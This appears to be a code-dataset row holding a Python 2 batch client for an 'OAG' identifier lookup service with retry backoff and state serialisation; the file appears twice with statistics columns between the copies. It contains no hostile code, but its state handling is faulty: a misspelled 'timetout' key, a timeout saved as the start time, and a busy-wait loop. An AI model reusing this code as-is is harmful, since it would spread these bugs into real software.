str(len(self.maxed.keys())) + " maxed"
return status
def finished(self):
if len(self.pending.keys()) == 0:
return True
if self.timeout is not None:
if datetime.utcnow() > self.timeout:
return True
return False
def get_due(self):
now = datetime.utcnow()
return [p for p in self.pending.keys() if self.pending[p].get("due") < now]
def next_due(self):
earliest = None
for p, o in self.pending.iteritems():
if earliest is None or o.get("due") < earliest:
earliest = o.get("due")
return earliest
def _record_maxed(self, id):
self.maxed[id] = self.pending[id]
del self.pending[id]
if "due" in self.maxed[id]:
del self.maxed[id]["due"]
def record_requested(self, identifiers):
for id in identifiers:
if id in self.pending:
self.pending[id]["requested"] += 1
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
else:
print "ERROR: id {id} is not in the pending list".format(id=id)
def record_result(self, result):
now = datetime.utcnow()
successes = result.get("results", [])
errors = result.get("errors", [])
processing = result.get("processing", [])
for s in successes:
id = s.get("identifier")[0].get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.success[id] = deepcopy(ourrecord)
self.success[id]["requested"] += 1
self.success[id]["found"] = now
del self.success[id]["due"]
del self.pending[id]
self.success_buffer.extend(successes)
for e in errors:
id = e.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.error[id] = deepcopy(ourrecord)
self.error[id]["requested"] += 1
self.error[id]["found"] = now
del self.error[id]["due"]
del self.pending[id]
self.error_buffer.extend(errors)
for p in processing:
id = p.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "ERROR: No record of pending id " + id
continue
self.pending[id]["requested"] += 1
self.pending[id]["due"] = self._backoff(self.pending[id]["requested"])
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
def flush_success(self):
buffer = self.success_buffer
self.success_buffer = []
return buffer
def flush_error(self):
buffer = self.error_buffer
self.error_buffer = []
return buffer
@classmethod
def from_json(cls, j):
state = RequestState([])
state.id = j.get("id")
if j.get("timetout"):
state.timeout = datetime.strptime(j.get("timeout"), cls._timestamp_format)
state.start = datetime.strptime(j.get("start"), cls._timestamp_format)
state.back_off_factor = j.get("back_off_factor")
state.max_back_off = j.get("max_back_off")
state.batch_size = j.get("batch_size")
if j.get("max_retries"):
state.max_retries = j.get("max_retries")
for s in j.get("success", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.success[s.get("id")] = obj
for s in j.get("error", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.error[s.get("id")] = obj
for s in j.get("pending", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["due"] = datetime.strptime(obj["due"], cls._timestamp_format)
state.pending[s.get("id")] = obj
for s in j.get("maxed", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
state.maxed[s.get("id")] = obj
return state
def json(self):
data = {}
data["id"] = self.id
data["start"] = datetime.strftime(self.start, self._timestamp_format)
if self.timeout is not None:
data["timeout"] = datetime.strftime(self.start, self._timestamp_format)
data["back_off_factor"] = self.back_off_factor
data["max_back_off"] = self.max_back_off
if self.max_retries is not None:
data["max_retries"] = self.max_retries
data["batch_size"] = self.batch_size
data["success"] = []
for k in self.success:
obj = {"id" : k}
obj.update(self.success[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["success"].append(obj)
data["error"] = []
for k in self.error:
obj = {"id" : k}
obj.update(self.error[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["error"].append(obj)
data["pending"] = []
for k in self.pending:
obj = {"id" : k}
obj.update(self.pending[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["due"] = datetime.strftime(obj["due"], self._timestamp_format)
data["pending"].append(obj)
data["maxed"] = []
for k in self.maxed:
obj = {"id" : k}
obj.update(self.maxed[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
data["maxed"].append(obj)
return data
def _backoff(self, times):
now = datetime.utcnow()
seconds = 2**times * self.back_off_factor
seconds = seconds if seconds < self.max_back_off else self.max_back_off
return now + timedelta(seconds=seconds)
class OAGClient(object):
def __init__(self, lookup_url=None):
self.lookup_url = lookup_url if lookup_url is not None else app.config.get("OAG_LOOKUP_URL")
def cycle(self, state, throttle=0, verbose=False):
due = state.get_due()
batches = self._batch(due, state.batch_size)
if verbose:
print str(len(due)) + " due; requesting in " + str(len(batches)) + " batches"
first = True
i = 1
print "Processing batch ",
for batch in batches:
if first:
first = False
elif throttle > 0:
time.sleep(throttle)
# first try and get the result - this could result in an HTTP error, and we
# don't want that to kill the thread. If it fails, record a request against the
# identifier but leave it pending
result = None
recorded = False
try:
result = self._query(batch)
except requests.exceptions.HTTPError as e:
# record the records in this batch as requested once more
state.record_requested(batch)
recorded = True
# if we get a result, then record it. Otherwise, again record the batch as requested
# but leave it in pending.
if result is not None:
state.record_result(result)
else:
# record the records in this batch as requested once more
if not recorded:
state.record_requested(batch)
print i,
sys.stdout.flush()
i += 1
print ""
return state
def _batch(self, ids, batch_size=1000):
batches = []
start = 0
while True:
batch = ids[start:start + batch_size]
if len(batch) == 0: break
batches.append(batch)
start += batch_size
return batches
def _query(self, batch, retries=10):
data = json.dumps(batch)
resp = http.post(self.lookup_url, retries=retries, headers={'Accept':'application/json'}, data=data)
if resp is None:
return None
elif resp.status_code == requests.codes.ok:
return resp.json()
else:
resp.raise_for_status()
def oag_it(lookup_url, identifiers,
timeout=None, back_off_factor=1, max_back_off=120, max_retries=None, batch_size=1000,
verbose=True, throttle=5,
callback=None, save_state=None):
state = RequestState(identifiers, timeout=timeout, back_off_factor=back_off_factor, max_back_off=max_back_off, max_retries=max_retries, batch_size=batch_size)
client = OAGClient(lookup_url)
if verbose:
print "Making requests to " + lookup_url + " for " + str(len(identifiers)) + " identifiers"
print state.print_parameters()
print state.print_status_report()
next = state.next_due()
while True:
# check whether we're supposed to do anything yet
now = datetime.utcnow()
if now < next:
continue
# if a cycle is due, issue it
client.cycle(state, throttle, verbose)
if verbose:
print state.print_status_report()
# run the callback on the state
if callback is not None:
callback("cycle", state)
# run the save method if there is one
if save_state is not None:
save_state(state)
# if we are finished, break
if state.finished():
callback("finished", state)
print "FINISHED"
break
# if we have done work here, update the next due time for the busy
# loop aboge
next = state.next_due()
print "Next request is due at", datetime.strftime(next, "%Y-%m-%d %H:%M:%S")
| 36.628571 | 162 | 0.569501 | from datetime import datetime, timedelta
import json, requests, time, sys, uuid
from copy import deepcopy
from octopus.core import app
from octopus.lib import http
class RequestState(object):
_timestamp_format = "%Y-%m-%dT%H:%M:%SZ"
def __init__(self, identifiers, timeout=None, back_off_factor=None, max_back_off=None, max_retries=None, batch_size=None, start=None):
self.id = uuid.uuid4().hex
self.success = {}
self.error = {}
self.pending = {}
self.maxed = {}
self.success_buffer = []
self.error_buffer = []
self.start = datetime.utcnow() if start is None else start
if timeout is None:
timeout = app.config.get("OAG_STATE_DEFAULT_TIMEOUT")
self.timeout = self.start + timedelta(seconds=timeout) if timeout is not None else None
if back_off_factor is None:
back_off_factor = app.config.get("OAG_STATE_BACK_OFF_FACTOR", 1)
self.back_off_factor = back_off_factor
if max_back_off is None:
max_back_off = app.config.get("OAG_STATE_MAX_BACK_OFF", 120)
self.max_back_off = max_back_off
if max_retries is None:
max_retries = app.config.get("OAG_STATE_MAX_RETRIES", None)
self.max_retries = max_retries
if batch_size is None:
batch_size = app.config.get("OAG_STATE_BATCH_SIZE", 1000)
self.batch_size = batch_size
for ident in identifiers:
self.pending[ident] = {"init" : self.start, "due" : self.start, "requested" : 0}
def print_parameters(self):
params = "Timeout: " + str(self.timeout) + "\n"
params += "Back Off Factor: " + str(self.back_off_factor) + "\n"
params += "Max Back Off: " + str(self.max_back_off) + "\n"
params += "Max Tries per Identifier: " + str(self.max_retries) + "\n"
params += "Batch Size: " + str(self.batch_size)
return params
def print_status_report(self):
status = str(len(self.success.keys())) + " received; " + \
str(len(self.error.keys())) + " errors; " + \
str(len(self.pending.keys())) + " pending; " + \
str(len(self.maxed.keys())) + " maxed"
return status
def finished(self):
if len(self.pending.keys()) == 0:
return True
if self.timeout is not None:
if datetime.utcnow() > self.timeout:
return True
return False
def get_due(self):
now = datetime.utcnow()
return [p for p in self.pending.keys() if self.pending[p].get("due") < now]
def next_due(self):
earliest = None
for p, o in self.pending.iteritems():
if earliest is None or o.get("due") < earliest:
earliest = o.get("due")
return earliest
def _record_maxed(self, id):
self.maxed[id] = self.pending[id]
del self.pending[id]
if "due" in self.maxed[id]:
del self.maxed[id]["due"]
def record_requested(self, identifiers):
for id in identifiers:
if id in self.pending:
self.pending[id]["requested"] += 1
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
else:
print "ERROR: id {id} is not in the pending list".format(id=id)
def record_result(self, result):
now = datetime.utcnow()
successes = result.get("results", [])
errors = result.get("errors", [])
processing = result.get("processing", [])
for s in successes:
id = s.get("identifier")[0].get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.success[id] = deepcopy(ourrecord)
self.success[id]["requested"] += 1
self.success[id]["found"] = now
del self.success[id]["due"]
del self.pending[id]
self.success_buffer.extend(successes)
for e in errors:
id = e.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.error[id] = deepcopy(ourrecord)
self.error[id]["requested"] += 1
self.error[id]["found"] = now
del self.error[id]["due"]
del self.pending[id]
self.error_buffer.extend(errors)
for p in processing:
id = p.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "ERROR: No record of pending id " + id
continue
self.pending[id]["requested"] += 1
self.pending[id]["due"] = self._backoff(self.pending[id]["requested"])
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
def flush_success(self):
buffer = self.success_buffer
self.success_buffer = []
return buffer
def flush_error(self):
buffer = self.error_buffer
self.error_buffer = []
return buffer
@classmethod
def from_json(cls, j):
state = RequestState([])
state.id = j.get("id")
if j.get("timetout"):
state.timeout = datetime.strptime(j.get("timeout"), cls._timestamp_format)
state.start = datetime.strptime(j.get("start"), cls._timestamp_format)
state.back_off_factor = j.get("back_off_factor")
state.max_back_off = j.get("max_back_off")
state.batch_size = j.get("batch_size")
if j.get("max_retries"):
state.max_retries = j.get("max_retries")
for s in j.get("success", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.success[s.get("id")] = obj
for s in j.get("error", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.error[s.get("id")] = obj
for s in j.get("pending", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["due"] = datetime.strptime(obj["due"], cls._timestamp_format)
state.pending[s.get("id")] = obj
for s in j.get("maxed", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
state.maxed[s.get("id")] = obj
return state
def json(self):
data = {}
data["id"] = self.id
data["start"] = datetime.strftime(self.start, self._timestamp_format)
if self.timeout is not None:
data["timeout"] = datetime.strftime(self.start, self._timestamp_format)
data["back_off_factor"] = self.back_off_factor
data["max_back_off"] = self.max_back_off
if self.max_retries is not None:
data["max_retries"] = self.max_retries
data["batch_size"] = self.batch_size
data["success"] = []
for k in self.success:
obj = {"id" : k}
obj.update(self.success[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["success"].append(obj)
data["error"] = []
for k in self.error:
obj = {"id" : k}
obj.update(self.error[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["error"].append(obj)
data["pending"] = []
for k in self.pending:
obj = {"id" : k}
obj.update(self.pending[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["due"] = datetime.strftime(obj["due"], self._timestamp_format)
data["pending"].append(obj)
data["maxed"] = []
for k in self.maxed:
obj = {"id" : k}
obj.update(self.maxed[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
data["maxed"].append(obj)
return data
def _backoff(self, times):
now = datetime.utcnow()
seconds = 2**times * self.back_off_factor
seconds = seconds if seconds < self.max_back_off else self.max_back_off
return now + timedelta(seconds=seconds)
class OAGClient(object):
def __init__(self, lookup_url=None):
self.lookup_url = lookup_url if lookup_url is not None else app.config.get("OAG_LOOKUP_URL")
def cycle(self, state, throttle=0, verbose=False):
due = state.get_due()
batches = self._batch(due, state.batch_size)
if verbose:
print str(len(due)) + " due; requesting in " + str(len(batches)) + " batches"
first = True
i = 1
print "Processing batch ",
for batch in batches:
if first:
first = False
elif throttle > 0:
time.sleep(throttle)
# identifier but leave it pending
result = None
recorded = False
try:
result = self._query(batch)
except requests.exceptions.HTTPError as e:
# record the records in this batch as requested once more
state.record_requested(batch)
recorded = True
# if we get a result, then record it. Otherwise, again record the batch as requested
# but leave it in pending.
if result is not None:
state.record_result(result)
else:
# record the records in this batch as requested once more
if not recorded:
state.record_requested(batch)
print i,
sys.stdout.flush()
i += 1
print ""
return state
def _batch(self, ids, batch_size=1000):
batches = []
start = 0
while True:
batch = ids[start:start + batch_size]
if len(batch) == 0: break
batches.append(batch)
start += batch_size
return batches
def _query(self, batch, retries=10):
data = json.dumps(batch)
resp = http.post(self.lookup_url, retries=retries, headers={'Accept':'application/json'}, data=data)
if resp is None:
return None
elif resp.status_code == requests.codes.ok:
return resp.json()
else:
resp.raise_for_status()
def oag_it(lookup_url, identifiers,
timeout=None, back_off_factor=1, max_back_off=120, max_retries=None, batch_size=1000,
verbose=True, throttle=5,
callback=None, save_state=None):
state = RequestState(identifiers, timeout=timeout, back_off_factor=back_off_factor, max_back_off=max_back_off, max_retries=max_retries, batch_size=batch_size)
client = OAGClient(lookup_url)
if verbose:
print "Making requests to " + lookup_url + " for " + str(len(identifiers)) + " identifiers"
print state.print_parameters()
print state.print_status_report()
next = state.next_due()
while True:
# check whether we're supposed to do anything yet
now = datetime.utcnow()
if now < next:
continue
client.cycle(state, throttle, verbose)
if verbose:
print state.print_status_report()
if callback is not None:
callback("cycle", state)
if save_state is not None:
save_state(state)
if state.finished():
callback("finished", state)
print "FINISHED"
break
next = state.next_due()
print "Next request is due at", datetime.strftime(next, "%Y-%m-%d %H:%M:%S")
| false | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.